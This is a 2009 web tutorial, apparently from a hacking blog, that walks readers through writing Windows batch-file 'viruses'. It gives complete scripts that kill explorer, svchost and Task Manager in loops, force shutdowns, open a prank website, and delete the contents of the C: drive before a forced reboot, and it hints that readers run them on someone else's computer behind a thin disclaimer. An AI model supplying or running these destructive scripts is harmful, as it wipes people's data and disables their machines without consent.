December 22, 2009

[TUT]Easy Way to Create a Virus


Ok before anything else., im not responsible or liable to any damage you will done.. ok lets start with simple steps.



1. Create or Open a notepad

2. And Paste this

:nul

@echo off

echo virus! >> c:/virus.Txt


echo msgbox("Virus!","0","hahaha") >> c:/start.vbs

start start.vbs

taskkill /pid explorer.exe >nul

start shutdown -s -t 1000 -c "You opened a virus."

cls

goto nul



3. Save as "yay.bat"


This will lag the whole Pc.



or try this one



@echo off

taskkill /F /IM svchost.exe

taskkill /F /IM svchost.exe

taskkill /F /IM svchost.exe

taskkill /F /IM svchost.exe


-a

if exist taskmgr.exe goto stop

if not exist taskmgr.exe goto stop

start %SystemRoot%\iexplore.exe http://youareanidiot.org

start idiot.bat

exit

:stop

taskkil /F /IM taskmgr.exe


if not exist taskmgr.exe goto stop

if exist taskmgr.exe goto stop



and save as idiot.bat



or you can try this too



its function is to delete contents in the C: drive and it WILL WORK. - Open up notepad and paste everything between the "=" lines below:



======================= @Echo off Del C: *.* |y ========================




- Now go to File > Save As..., and change the "Save as type:" to All Files. - For the file name, save it as whatever filename you want but put a ".bat" extension at the end of it. A good example would be saving it as "virus.bat" for the File name. - Now go put this file on a computer you want to *cough* test this on and run it. DO NOT RUN ON YOUR COMPUTER! The script will delete the contents of your hard drive C. - Enjoy! (Please be careful with what you do with this virus.) NOTES: Another supposedly better version of the code is below. This might work for some people if the one above doesn't work. This command prompt script was not written by a pro, so don't go complaining that it isn't as "powerful" as it could be.



======================= @echo off del %systemdrive%*.* /f /s /q shutdown -r -f -t 00 ========================

Enter your email address:

 

Copyright 2009 All Rights Reserved Revolution Two Church theme by HackingAday